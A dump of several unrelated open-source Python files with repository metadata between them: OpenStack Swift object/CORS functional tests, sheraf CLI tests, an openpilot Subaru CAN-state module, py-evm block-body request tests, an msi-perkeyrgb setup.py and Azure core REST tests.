parsed.path, self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(get, use_account=3)
self.assertEqual(resp.read(), ''.join(segments3))
self.assertEqual(resp.status, 200)
# Delete the manifest
def delete(url, token, parsed, conn, objnum):
conn.request('DELETE', '%s/%s/manifest' % (
parsed.path,
self.container), '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete, objnum)
resp.read()
self.assertIn(resp.status, (204, 404))
# Delete the third set of segments
def delete(url, token, parsed, conn, objnum):
conn.request('DELETE', '%s/%s/segments3/%s' % (
parsed.path, acontainer, str(objnum)), '',
{'X-Auth-Token': token})
return check_response(conn)
for objnum in range(len(segments3)):
resp = retry(delete, objnum)
resp.read()
self.assertIn(resp.status, (204, 404))
# Delete the second set of segments
def delete(url, token, parsed, conn, objnum):
conn.request('DELETE', '%s/%s/segments2/%s' % (
parsed.path, self.container, str(objnum)), '',
{'X-Auth-Token': token})
return check_response(conn)
for objnum in range(len(segments2)):
resp = retry(delete, objnum)
resp.read()
self.assertIn(resp.status, (204, 404))
# Delete the first set of segments
def delete(url, token, parsed, conn, objnum):
conn.request('DELETE', '%s/%s/segments1/%s' % (
parsed.path, self.container, str(objnum)), '',
{'X-Auth-Token': token})
return check_response(conn)
for objnum in range(len(segments1)):
resp = retry(delete, objnum)
resp.read()
self.assertIn(resp.status, (204, 404))
# Delete the extra container
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s' % (parsed.path, acontainer), '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
def test_delete_content_type(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/hi' % (parsed.path, self.container),
'there', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s/hi' % (parsed.path, self.container),
'', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertIn(resp.status, (204, 404))
self.assertEqual(resp.getheader('Content-Type'),
'text/html; charset=UTF-8')
def test_delete_if_delete_at_bad(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn):
conn.request('PUT',
'%s/%s/hi-delete-bad' % (parsed.path, self.container),
'there', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def delete(url, token, parsed, conn):
conn.request('DELETE', '%s/%s/hi' % (parsed.path, self.container),
'', {'X-Auth-Token': token,
'X-If-Delete-At': 'bad'})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertEqual(resp.status, 400)
def test_null_name(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/abc%%00def' % (
parsed.path,
self.container), 'test', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
if (tf.web_front_end == 'apache2'):
self.assertEqual(resp.status, 404)
else:
self.assertEqual(resp.read(), 'Invalid UTF8 or contains NULL')
self.assertEqual(resp.status, 412)
def test_cors(self):
if tf.skip:
raise SkipTest
try:
strict_cors = tf.cluster_info['swift']['strict_cors_mode']
except KeyError:
raise SkipTest("cors mode is unknown")
def put_cors_cont(url, token, parsed, conn, orig):
conn.request(
'PUT', '%s/%s' % (parsed.path, self.container),
'', {'X-Auth-Token': token,
'X-Container-Meta-Access-Control-Allow-Origin': orig})
return check_response(conn)
def put_obj(url, token, parsed, conn, obj):
conn.request(
'PUT', '%s/%s/%s' % (parsed.path, self.container, obj),
'test', {'X-Auth-Token': token})
return check_response(conn)
def check_cors(url, token, parsed, conn,
method, obj, headers):
if method != 'OPTIONS':
headers['X-Auth-Token'] = token
conn.request(
method, '%s/%s/%s' % (parsed.path, self.container, obj),
'', headers)
return conn.getresponse()
resp = retry(put_cors_cont, '*')
resp.read()
self.assertEqual(resp.status // 100, 2)
resp = retry(put_obj, 'cat')
resp.read()
self.assertEqual(resp.status // 100, 2)
resp = retry(check_cors,
'OPTIONS', 'cat', {'Origin': 'http://m.com'})
self.assertEqual(resp.status, 401)
resp = retry(check_cors,
'OPTIONS', 'cat',
{'Origin': 'http://m.com',
'Access-Control-Request-Method': 'GET'})
self.assertEqual(resp.status, 200)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('access-control-allow-origin'),
'*')
resp = retry(check_cors,
'GET', 'cat', {'Origin': 'http://m.com'})
self.assertEqual(resp.status, 200)
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('access-control-allow-origin'),
'*')
resp = retry(check_cors,
'GET', 'cat', {'Origin': 'http://m.com',
'X-Web-Mode': 'True'})
self.assertEqual(resp.status, 200)
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('access-control-allow-origin'),
'*')
####################
resp = retry(put_cors_cont, 'http://secret.com')
resp.read()
self.assertEqual(resp.status // 100, 2)
resp = retry(check_cors,
'OPTIONS', 'cat',
{'Origin': 'http://m.com',
'Access-Control-Request-Method': 'GET'})
resp.read()
self.assertEqual(resp.status, 401)
if strict_cors:
resp = retry(check_cors,
'GET', 'cat', {'Origin': 'http://m.com'})
resp.read()
self.assertEqual(resp.status, 200)
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertNotIn('access-control-allow-origin', headers)
resp = retry(check_cors,
'GET', 'cat', {'Origin': 'http://secret.com'})
resp.read()
self.assertEqual(resp.status, 200)
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('access-control-allow-origin'),
'http://secret.com')
else:
resp = retry(check_cors,
'GET', 'cat', {'Origin': 'http://m.com'})
resp.read()
self.assertEqual(resp.status, 200)
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('access-control-allow-origin'),
'http://m.com')
@requires_policies
def test_cross_policy_copy(self):
# create container in first policy
policy = self.policies.select()
container = self._create_container(
headers={'X-Storage-Policy': policy['name']})
obj = uuid4().hex
# create a container in second policy
other_policy = self.policies.exclude(name=policy['name']).select()
other_container = self._create_container(
headers={'X-Storage-Policy': other_policy['name']})
other_obj = uuid4().hex
def put_obj(url, token, parsed, conn, container, obj):
# to keep track of things, use the original path as the body
content = '%s/%s' % (container, obj)
path = '%s/%s' % (parsed.path, content)
conn.request('PUT', path, content, {'X-Auth-Token': token})
return check_response(conn)
# create objects
for c, o in zip((container, other_container), (obj, other_obj)):
resp = retry(put_obj, c, o)
resp.read()
self.assertEqual(resp.status, 201)
def put_copy_from(url, token, parsed, conn, container, obj, source):
dest_path = '%s/%s/%s' % (parsed.path, container, obj)
conn.request('PUT', dest_path, '',
{'X-Auth-Token': token,
'Content-Length': '0',
'X-Copy-From': source})
return check_response(conn)
copy_requests = (
(container, other_obj, '%s/%s' % (other_container, other_obj)),
(other_container, obj, '%s/%s' % (container, obj)),
)
# copy objects
for c, o, source in copy_requests:
resp = retry(put_copy_from, c, o, source)
resp.read()
self.assertEqual(resp.status, 201)
def get_obj(url, token, parsed, conn, container, obj):
path = '%s/%s/%s' % (parsed.path, container, obj)
conn.request('GET', path, '', {'X-Auth-Token': token})
return check_response(conn)
# validate contents, contents should be source
validate_requests = copy_requests
for c, o, body in validate_requests:
resp = retry(get_obj, c, o)
self.assertEqual(resp.status, 200)
self.assertEqual(body, resp.read())
if __name__ == '__main__':
unittest2.main()
| 37.619249
| 79
| 0.525078
|
e6be50b4825d1d47f14ea525eb7f25a4a9bb0a68
| 5,359
|
py
|
Python
|
tests/test_cli.py
|
yaal-coop/sheraf
|
774e3781bc6ff2e16c6cc39f268d475b5e64fcea
|
[
"MIT"
] | null | null | null |
tests/test_cli.py
|
yaal-coop/sheraf
|
774e3781bc6ff2e16c6cc39f268d475b5e64fcea
|
[
"MIT"
] | null | null | null |
tests/test_cli.py
|
yaal-coop/sheraf
|
774e3781bc6ff2e16c6cc39f268d475b5e64fcea
|
[
"MIT"
] | null | null | null |
import re
import sheraf
from click.testing import CliRunner
from sheraf.cli import cli
class CliModel(sheraf.Model):
table = "climymodel"
foo = sheraf.StringAttribute().index()
boo = sheraf.StringAttribute().index()
def test_healthcheck_conflict_resolution(sheraf_zeo_database):
with sheraf.connection(commit=True):
CliModel.create(foo="bar")
runner = CliRunner()
result = runner.invoke(
cli, [f"{sheraf_zeo_database.uri}&database_name=cli", "check", "tests.test_cli"]
)
assert result.exit_code == 0, result.output
assert "check_model_index" in result.output
assert "check_attributes_index" in result.output
assert re.search(r"tests.test_cli.CliModel[^\n]*0[^\n]*1", result.output)
def test_rebuild_all_models_all_indexes(sheraf_zeo_database):
with sheraf.connection(commit=True) as conn:
bar = CliModel.create(foo="bar", boo="bar")
baz = CliModel.create(foo="baz", boo="baz")
del conn.root()[CliModel.table]["foo"]
del conn.root()[CliModel.table]["boo"]
runner = CliRunner()
result = runner.invoke(
cli,
[f"{sheraf_zeo_database.uri}&database_name=cli", "rebuild", "tests.test_cli"],
)
assert result.exit_code == 0, result.output
with sheraf.connection() as conn:
assert "foo" in conn.root()[CliModel.table]
assert "boo" in conn.root()[CliModel.table]
assert bar in CliModel.search(foo="bar")
assert baz in CliModel.search(foo="baz")
def test_rebuild_all_models_one_index(sheraf_zeo_database):
with sheraf.connection(commit=True) as conn:
bar = CliModel.create(foo="bar", boo="bar")
baz = CliModel.create(foo="baz", boo="baz")
del conn.root()[CliModel.table]["foo"]
del conn.root()[CliModel.table]["boo"]
runner = CliRunner()
result = runner.invoke(
cli,
[
f"{sheraf_zeo_database.uri}&database_name=cli",
"rebuild",
"tests.test_cli",
"--index",
"foo",
],
)
assert result.exit_code == 0, result.output
with sheraf.connection() as conn:
assert "foo" in conn.root()[CliModel.table]
assert "boo" not in conn.root()[CliModel.table]
assert bar in CliModel.search(foo="bar")
assert baz in CliModel.search(foo="baz")
def test_rebuild_one_model_all_index(sheraf_zeo_database):
with sheraf.connection(commit=True) as conn:
bar = CliModel.create(foo="bar", boo="bar")
baz = CliModel.create(foo="baz", boo="baz")
del conn.root()[CliModel.table]["foo"]
del conn.root()[CliModel.table]["boo"]
runner = CliRunner()
result = runner.invoke(
cli,
[
f"{sheraf_zeo_database.uri}&database_name=cli",
"rebuild",
"tests.test_cli.CliModel",
],
)
assert result.exit_code == 0, result.output
with sheraf.connection() as conn:
assert "foo" in conn.root()[CliModel.table]
assert "boo" in conn.root()[CliModel.table]
assert bar in CliModel.search(foo="bar")
assert baz in CliModel.search(foo="baz")
def test_rebuild_savepoint(sheraf_zeo_database):
with sheraf.connection(commit=True) as conn:
for _ in range(100):
baz = CliModel.create(foo="baz", boo="baz")
del conn.root()[CliModel.table]["foo"]
runner = CliRunner()
result = runner.invoke(
cli,
[
f"{sheraf_zeo_database.uri}&database_name=cli",
"rebuild",
"tests.test_cli",
"--index",
"foo",
"--batch-size",
"25",
],
)
assert result.exit_code == 0, result.output
with sheraf.connection() as conn:
assert "foo" in conn.root()[CliModel.table]
assert baz in CliModel.search(foo="baz")
def test_rebuild_commit(sheraf_zeo_database):
with sheraf.connection(commit=True) as conn:
for _ in range(100):
baz = CliModel.create(foo="baz", boo="baz")
del conn.root()[CliModel.table]["foo"]
runner = CliRunner()
result = runner.invoke(
cli,
[
f"{sheraf_zeo_database.uri}&database_name=cli",
"rebuild",
"tests.test_cli",
"--index",
"foo",
"--batch-size",
"25",
"--commit",
],
)
assert result.exit_code == 0, result.output
with sheraf.connection() as conn:
assert "foo" in conn.root()[CliModel.table]
assert baz in CliModel.search(foo="baz")
def test_rebuild_fork(sheraf_zeo_database):
with sheraf.connection(commit=True) as conn:
for _ in range(100):
baz = CliModel.create(foo="baz", boo="baz")
del conn.root()[CliModel.table]["foo"]
runner = CliRunner()
result = runner.invoke(
cli,
[
f"{sheraf_zeo_database.uri}&database_name=cli",
"rebuild",
"tests.test_cli",
"--index",
"foo",
"--batch-size",
"25",
"--fork",
],
)
assert result.exit_code == 0, result.output
with sheraf.connection() as conn:
assert "foo" in conn.root()[CliModel.table]
assert baz in CliModel.search(foo="baz")
| 29.284153
| 88
| 0.591715
|
176018f54b057f8d07b980313c543fba4fe9fcf2
| 7,735
|
py
|
Python
|
selfdrive/car/subaru/carstate.py
|
StingrayCharles/openpilot
|
6a48212422ef05792dde058e36c5c3099f17f619
|
[
"MIT"
] | 23
|
2018-08-17T11:02:00.000Z
|
2020-12-23T01:46:44.000Z
|
selfdrive/car/subaru/carstate.py
|
StingrayCharles/openpilot
|
6a48212422ef05792dde058e36c5c3099f17f619
|
[
"MIT"
] | 2
|
2020-04-14T22:39:11.000Z
|
2020-05-03T19:17:40.000Z
|
selfdrive/car/subaru/carstate.py
|
StingrayCharles/openpilot
|
6a48212422ef05792dde058e36c5c3099f17f619
|
[
"MIT"
] | 44
|
2018-07-31T04:26:19.000Z
|
2021-01-08T22:46:30.000Z
|
import copy
from selfdrive.config import Conversions as CV
from selfdrive.car.interfaces import CarStateBase
from opendbc.can.parser import CANParser
from selfdrive.car.subaru.values import CAR, DBC, STEER_THRESHOLD
def get_powertrain_can_parser(CP):
# this function generates lists for signal, messages and initial values
signals = [
# sig_name, sig_address, default
("Steer_Torque_Sensor", "Steering_Torque", 0),
("Steering_Angle", "Steering_Torque", 0),
("Cruise_On", "CruiseControl", 0),
("Cruise_Activated", "CruiseControl", 0),
("Brake_Pedal", "Brake_Pedal", 0),
("Throttle_Pedal", "Throttle", 0),
("LEFT_BLINKER", "Dashlights", 0),
("RIGHT_BLINKER", "Dashlights", 0),
("SEATBELT_FL", "Dashlights", 0),
("FL", "Wheel_Speeds", 0),
("FR", "Wheel_Speeds", 0),
("RL", "Wheel_Speeds", 0),
("RR", "Wheel_Speeds", 0),
("DOOR_OPEN_FR", "BodyInfo", 1),
("DOOR_OPEN_FL", "BodyInfo", 1),
("DOOR_OPEN_RR", "BodyInfo", 1),
("DOOR_OPEN_RL", "BodyInfo", 1),
]
checks = [
# sig_address, frequency
("Dashlights", 10),
("Wheel_Speeds", 50),
("Steering_Torque", 50),
]
if CP.carFingerprint == CAR.IMPREZA:
signals += [
("Units", "Dash_State", 1),
]
checks += [
("BodyInfo", 10),
("CruiseControl", 20),
]
if CP.carFingerprint in [CAR.OUTBACK, CAR.LEGACY, CAR.FORESTER]:
signals += [
("LKA_Lockout", "Steering_Torque", 0),
]
checks += [
("CruiseControl", 50),
]
return CANParser(DBC[CP.carFingerprint]['pt'], signals, checks, 0)
def get_camera_can_parser(CP):
signals = [
]
checks = [
]
if CP.carFingerprint == CAR.IMPREZA:
signals += [
("Cruise_Set_Speed", "ES_DashStatus", 0),
("Counter", "ES_Distance", 0),
("Signal1", "ES_Distance", 0),
("Signal2", "ES_Distance", 0),
("Main", "ES_Distance", 0),
("Signal3", "ES_Distance", 0),
("Checksum", "ES_LKAS_State", 0),
("Counter", "ES_LKAS_State", 0),
("Keep_Hands_On_Wheel", "ES_LKAS_State", 0),
("Empty_Box", "ES_LKAS_State", 0),
("Signal1", "ES_LKAS_State", 0),
("LKAS_ACTIVE", "ES_LKAS_State", 0),
("Signal2", "ES_LKAS_State", 0),
("Backward_Speed_Limit_Menu", "ES_LKAS_State", 0),
("LKAS_ENABLE_3", "ES_LKAS_State", 0),
("Signal3", "ES_LKAS_State", 0),
("LKAS_ENABLE_2", "ES_LKAS_State", 0),
("Signal4", "ES_LKAS_State", 0),
("LKAS_Left_Line_Visible", "ES_LKAS_State", 0),
("Signal6", "ES_LKAS_State", 0),
("LKAS_Right_Line_Visible", "ES_LKAS_State", 0),
("Signal7", "ES_LKAS_State", 0),
("FCW_Cont_Beep", "ES_LKAS_State", 0),
("FCW_Repeated_Beep", "ES_LKAS_State", 0),
("Throttle_Management_Activated", "ES_LKAS_State", 0),
("Traffic_light_Ahead", "ES_LKAS_State", 0),
("Right_Depart", "ES_LKAS_State", 0),
("Signal5", "ES_LKAS_State", 0),
]
checks += [
("ES_DashStatus", 10),
]
if CP.carFingerprint in [CAR.OUTBACK, CAR.LEGACY, CAR.FORESTER]:
signals += [
("Brake_On", "ES_CruiseThrottle", 0),
("Button", "ES_CruiseThrottle", 0),
("CloseDistance", "ES_CruiseThrottle", 0),
("Counter", "ES_CruiseThrottle", 0),
("Cruise_Activatedish", "ES_CruiseThrottle", 0),
("DistanceSwap", "ES_CruiseThrottle", 0),
("ES_Error", "ES_CruiseThrottle", 0),
("NEW_SIGNAL_1", "ES_CruiseThrottle", 0),
("Unknown", "ES_CruiseThrottle", 0),
("SET_0_1", "ES_CruiseThrottle", 0),
("SET_0_2", "ES_CruiseThrottle", 0),
("SET_0_3", "ES_CruiseThrottle", 0),
("SET_0_4", "ES_CruiseThrottle", 0),
("SET_1", "ES_CruiseThrottle", 0),
("SET_2", "ES_CruiseThrottle", 0),
("NEW_SIGNAL_9", "ES_CruiseThrottle", 0),
("Standstill", "ES_CruiseThrottle", 0),
("Standstill_2", "ES_CruiseThrottle", 0),
("Throttle_Cruise", "ES_CruiseThrottle", 0),
]
if CP.carFingerprint in [CAR.OUTBACK, CAR.LEGACY]:
signals += [
("Not_Ready_Startup", "ES_DashStatus", 0),
("Cruise_Set_Speed", "ES_DashStatus", 0),
]
checks += [
("ES_DashStatus", 10),
]
return CANParser(DBC[CP.carFingerprint]['pt'], signals, checks, 2)
class CarState(CarStateBase):
def __init__(self, CP):
super().__init__(CP)
# initialize can parser
self.left_blinker_cnt = 0
self.right_blinker_cnt = 0
def update(self, cp, cp_cam):
self.pedal_gas = cp.vl["Throttle"]['Throttle_Pedal']
self.brake_pressure = cp.vl["Brake_Pedal"]['Brake_Pedal']
self.user_gas_pressed = self.pedal_gas > 0
self.brake_pressed = self.brake_pressure > 0
self.brake_lights = bool(self.brake_pressed)
self.v_wheel_fl = cp.vl["Wheel_Speeds"]['FL'] * CV.KPH_TO_MS
self.v_wheel_fr = cp.vl["Wheel_Speeds"]['FR'] * CV.KPH_TO_MS
self.v_wheel_rl = cp.vl["Wheel_Speeds"]['RL'] * CV.KPH_TO_MS
self.v_wheel_rr = cp.vl["Wheel_Speeds"]['RR'] * CV.KPH_TO_MS
self.v_cruise_pcm = cp_cam.vl["ES_DashStatus"]['Cruise_Set_Speed']
self.v_ego_raw = (self.v_wheel_fl + self.v_wheel_fr + self.v_wheel_rl + self.v_wheel_rr) / 4.
# Kalman filter, even though Subaru raw wheel speed is heaviliy filtered by default
self.v_ego, self.a_ego = self.update_speed_kf(self.v_ego_raw)
self.standstill = self.v_ego_raw < 0.01
self.prev_left_blinker_on = self.left_blinker_on
self.prev_right_blinker_on = self.right_blinker_on
# continuous blinker signals for assisted lane change
self.left_blinker_cnt = 50 if cp.vl["Dashlights"]['LEFT_BLINKER'] else max(self.left_blinker_cnt - 1, 0)
self.left_blinker_on = self.left_blinker_cnt > 0
self.right_blinker_cnt = 50 if cp.vl["Dashlights"]['RIGHT_BLINKER'] else max(self.right_blinker_cnt - 1, 0)
self.right_blinker_on = self.right_blinker_cnt > 0
self.steer_torque_driver = cp.vl["Steering_Torque"]['Steer_Torque_Sensor']
self.acc_active = cp.vl["CruiseControl"]['Cruise_Activated']
self.main_on = cp.vl["CruiseControl"]['Cruise_On']
self.steer_override = abs(self.steer_torque_driver) > STEER_THRESHOLD[self.car_fingerprint]
self.angle_steers = cp.vl["Steering_Torque"]['Steering_Angle']
self.door_open = any([cp.vl["BodyInfo"]['DOOR_OPEN_RR'],
cp.vl["BodyInfo"]['DOOR_OPEN_RL'],
cp.vl["BodyInfo"]['DOOR_OPEN_FR'],
cp.vl["BodyInfo"]['DOOR_OPEN_FL']])
if self.car_fingerprint == CAR.IMPREZA:
self.seatbelt_unlatched = cp.vl["Dashlights"]['SEATBELT_FL'] == 1
self.v_cruise_pcm = cp_cam.vl["ES_DashStatus"]["Cruise_Set_Speed"] * CV.MPH_TO_KPH
self.steer_not_allowed = 0
self.es_distance_msg = copy.copy(cp_cam.vl["ES_Distance"])
self.es_lkas_msg = copy.copy(cp_cam.vl["ES_LKAS_State"])
# 1 = imperial, 6 = metric
if cp.vl["Dash_State"]['Units'] == 1:
self.v_cruise_pcm *= CV.MPH_TO_KPH
if self.car_fingerprint in [CAR.OUTBACK, CAR.LEGACY, CAR.FORESTER]:
self.seatbelt_unlatched = False # FIXME: stock ACC disengages on unlatch so this is fine for now, signal has not yet been found
self.steer_not_allowed = cp.vl["Steering_Torque"]["LKA_Lockout"]
self.button = cp_cam.vl["ES_CruiseThrottle"]["Button"]
self.brake_hold = cp_cam.vl["ES_CruiseThrottle"]["Standstill"]
self.close_distance = cp_cam.vl["ES_CruiseThrottle"]["CloseDistance"]
self.es_accel_msg = copy.copy(cp_cam.vl["ES_CruiseThrottle"])
if self.car_fingerprint in [CAR.FORESTER]:
self.v_cruise_pcm = 0
self.ready = True
if self.car_fingerprint in [CAR.OUTBACK, CAR.LEGACY]:
self.v_cruise_pcm = cp_cam.vl["ES_DashStatus"]["Cruise_Set_Speed"]
self.ready = not cp_cam.vl["ES_DashStatus"]["Not_Ready_Startup"]
| 37.36715
| 133
| 0.649386
|
f8941b952d9f39ea79724c163d9bd18875d87d13
| 4,935
|
py
|
Python
|
tests/trinity/core/p2p-proto/test_block_bodies_request_object.py
|
pipermerriam/py-evm
|
5a52ce035d77483577395a18f782b42ca78de77b
|
[
"MIT"
] | 137
|
2017-03-17T11:37:51.000Z
|
2022-03-07T07:51:28.000Z
|
tests/trinity/core/p2p-proto/test_block_bodies_request_object.py
|
retzger/py-evm
|
5a52ce035d77483577395a18f782b42ca78de77b
|
[
"MIT"
] | 102
|
2017-04-07T10:43:03.000Z
|
2018-11-11T18:01:56.000Z
|
tests/trinity/core/p2p-proto/test_block_bodies_request_object.py
|
retzger/py-evm
|
5a52ce035d77483577395a18f782b42ca78de77b
|
[
"MIT"
] | 39
|
2017-03-17T11:38:52.000Z
|
2021-02-18T23:05:17.000Z
|
import os
import random
import time
import pytest
import rlp
from eth_hash.auto import keccak
from eth_utils import (
to_tuple,
big_endian_to_int,
)
from eth.db.trie import make_trie_root_and_nodes
from eth.rlp.headers import BlockHeader
from eth.rlp.transactions import BaseTransactionFields
from p2p.exceptions import ValidationError
from trinity.rlp.block_body import BlockBody
from trinity.protocol.eth.requests import BlockBodiesRequest
def mk_uncle(block_number):
return BlockHeader(
state_root=os.urandom(32),
difficulty=1000000,
block_number=block_number,
gas_limit=3141592,
timestamp=int(time.time()),
)
def mk_transaction():
return BaseTransactionFields(
nonce=0,
gas=21000,
gas_price=1,
to=os.urandom(20),
value=random.randint(0, 100),
data=b'',
v=27,
r=big_endian_to_int(os.urandom(32)),
s=big_endian_to_int(os.urandom(32)),
)
def mk_header_and_body(block_number, num_transactions, num_uncles):
transactions = tuple(mk_transaction() for _ in range(num_transactions))
uncles = tuple(mk_uncle(block_number - 1) for _ in range(num_uncles))
transaction_root, trie_data = make_trie_root_and_nodes(transactions)
uncles_hash = keccak(rlp.encode(uncles))
body = BlockBody(transactions=transactions, uncles=uncles)
header = BlockHeader(
difficulty=1000000,
block_number=block_number,
gas_limit=3141592,
timestamp=int(time.time()),
transaction_root=transaction_root,
uncles_hash=uncles_hash,
)
return header, body, transaction_root, trie_data, uncles_hash
@to_tuple
def mk_headers(*counts):
for idx, (num_transactions, num_uncles) in enumerate(counts, 1):
yield mk_header_and_body(idx, num_transactions, num_uncles)
def test_block_bodies_request_empty_response_is_valid():
headers_bundle = mk_headers((2, 3), (8, 4), (0, 1), (0, 0))
headers, _, _, _, _ = zip(*headers_bundle)
request = BlockBodiesRequest(headers)
request.validate_response(tuple(), tuple())
def test_block_bodies_request_valid_with_full_response():
headers_bundle = mk_headers((2, 3), (8, 4), (0, 1), (0, 0))
headers, bodies, transactions_roots, trie_data_dicts, uncles_hashes = zip(*headers_bundle)
transactions_bundles = tuple(zip(transactions_roots, trie_data_dicts))
bodies_bundle = tuple(zip(bodies, transactions_bundles, uncles_hashes))
request = BlockBodiesRequest(headers)
request.validate_response(bodies, bodies_bundle)
def test_block_bodies_request_valid_with_partial_response():
headers_bundle = mk_headers((2, 3), (8, 4), (0, 1), (0, 0))
headers, bodies, transactions_roots, trie_data_dicts, uncles_hashes = zip(*headers_bundle)
transactions_bundles = tuple(zip(transactions_roots, trie_data_dicts))
bodies_bundle = tuple(zip(bodies, transactions_bundles, uncles_hashes))
request = BlockBodiesRequest(headers)
request.validate_response(bodies[:2], bodies_bundle[:2])
request.validate_response(bodies[2:], bodies_bundle[2:])
request.validate_response(
(bodies[0], bodies[2], bodies[3]),
(bodies_bundle[0], bodies_bundle[2], bodies_bundle[3]),
)
def test_block_bodies_request_with_fully_invalid_response():
headers_bundle = mk_headers((2, 3), (8, 4), (0, 1), (0, 0))
headers, _, _, _, _ = zip(*headers_bundle)
wrong_headers_bundle = mk_headers((3, 2), (4, 8), (1, 0), (0, 0))
w_headers, w_bodies, w_transactions_roots, w_trie_data_dicts, w_uncles_hashes = zip(
*wrong_headers_bundle
)
w_transactions_bundles = tuple(zip(w_transactions_roots, w_trie_data_dicts))
w_bodies_bundle = tuple(zip(w_bodies, w_transactions_bundles, w_uncles_hashes))
request = BlockBodiesRequest(headers)
with pytest.raises(ValidationError):
request.validate_response(w_bodies, w_bodies_bundle)
def test_block_bodies_request_with_extra_unrequested_bodies():
headers_bundle = mk_headers((2, 3), (8, 4), (0, 1), (0, 0))
headers, bodies, transactions_roots, trie_data_dicts, uncles_hashes = zip(*headers_bundle)
transactions_bundles = tuple(zip(transactions_roots, trie_data_dicts))
bodies_bundle = tuple(zip(bodies, transactions_bundles, uncles_hashes))
request = BlockBodiesRequest(headers)
wrong_headers_bundle = mk_headers((3, 2), (4, 8), (1, 0), (0, 0))
w_headers, w_bodies, w_transactions_roots, w_trie_data_dicts, w_uncles_hashes = zip(
*wrong_headers_bundle
)
w_transactions_bundles = tuple(zip(w_transactions_roots, w_trie_data_dicts))
w_bodies_bundle = tuple(zip(w_bodies, w_transactions_bundles, w_uncles_hashes))
request = BlockBodiesRequest(headers)
with pytest.raises(ValidationError):
request.validate_response(
bodies + w_bodies,
bodies_bundle + w_bodies_bundle,
)
| 34.270833
| 94
| 0.721581
|
9c8994f783b9f06bb12e5c323255fd1caa993a91
| 837
|
py
|
Python
|
setup.py
|
TauAkiou/msi-perkeyrgb
|
87c92ac23a81372a2ad604a7421bf0da6dbc4f08
|
[
"MIT"
] | 2
|
2019-10-14T18:13:12.000Z
|
2021-03-08T17:53:46.000Z
|
setup.py
|
TauAkiou/msi-perkeyrgb
|
87c92ac23a81372a2ad604a7421bf0da6dbc4f08
|
[
"MIT"
] | 1
|
2019-11-04T18:07:12.000Z
|
2019-11-04T18:07:12.000Z
|
setup.py
|
TauAkiou/msi-perkeyrgb
|
87c92ac23a81372a2ad604a7421bf0da6dbc4f08
|
[
"MIT"
] | 4
|
2019-10-25T01:38:10.000Z
|
2022-01-03T16:25:08.000Z
|
#!/usr/bin/env python
from os.path import dirname, join
from setuptools import setup
setup(
name='msi-perkeyrgb',
version='1.4-effect-alpha',
description='Configuration tool for per-key RGB keyboards on MSI laptops.',
long_description=open(
join(dirname(__file__), 'README.md')).read(),
url='https://github.com/Askannz/msi-perkeyrgb',
author='Robin Lange',
author_email='robin.langenc@gmail.com',
license='MIT',
packages=['msi_perkeyrgb'],
entry_points={
'console_scripts': [
'msi-perkeyrgb=msi_perkeyrgb.main:main',
],
},
package_data={'msi_perkeyrgb': ['presets/*.json']},
keywords=['msi', 'rgb', 'keyboard', 'per-key'],
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
],
)
| 28.862069
| 79
| 0.626045
|
34f80297153704881595a340a09c090274cebdb6
| 3,051
|
py
|
Python
|
sdk/core/azure-core/tests/testserver_tests/test_rest_context_manager.py
|
hugovk/azure-sdk-for-python
|
728b28b5489f46548eb8db200a49927881c282c1
|
[
"MIT"
] | 1
|
2021-04-26T21:15:01.000Z
|
2021-04-26T21:15:01.000Z
|
sdk/core/azure-core/tests/testserver_tests/test_rest_context_manager.py
|
hugovk/azure-sdk-for-python
|
728b28b5489f46548eb8db200a49927881c282c1
|
[
"MIT"
] | 2
|
2021-08-24T15:32:30.000Z
|
2021-08-24T23:21:34.000Z
|
sdk/core/azure-core/tests/testserver_tests/test_rest_context_manager.py
|
paikend/azure-sdk-for-python
|
5772d14728569fce7b40552a0f20795d12ecd797
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE.txt in the project root for
# license information.
# -------------------------------------------------------------------------
import pytest
from azure.core.rest import HttpRequest
from azure.core.exceptions import ResponseNotReadError
def test_normal_call(client, port):
def _raise_and_get_text(response):
response.raise_for_status()
assert response.text == "Hello, world!"
assert response.is_closed
request = HttpRequest("GET", url="/basic/string")
response = client.send_request(request)
_raise_and_get_text(response)
assert response.is_closed
with client.send_request(request) as response:
_raise_and_get_text(response)
response = client.send_request(request)
with response as response:
_raise_and_get_text(response)
def test_stream_call(client):
def _raise_and_get_text(response):
response.raise_for_status()
assert not response.is_closed
with pytest.raises(ResponseNotReadError):
response.text
response.read()
assert response.text == "Hello, world!"
assert response.is_closed
request = HttpRequest("GET", url="/streams/basic")
response = client.send_request(request, stream=True)
_raise_and_get_text(response)
assert response.is_closed
with client.send_request(request, stream=True) as response:
_raise_and_get_text(response)
assert response.is_closed
response = client.send_request(request, stream=True)
with response as response:
_raise_and_get_text(response)
# TODO: commenting until https://github.com/Azure/azure-sdk-for-python/issues/18086 is fixed
# def test_stream_with_error(client):
# request = HttpRequest("GET", url="/streams/error")
# with client.send_request(request, stream=True) as response:
# assert not response.is_closed
# with pytest.raises(HttpResponseError) as e:
# response.raise_for_status()
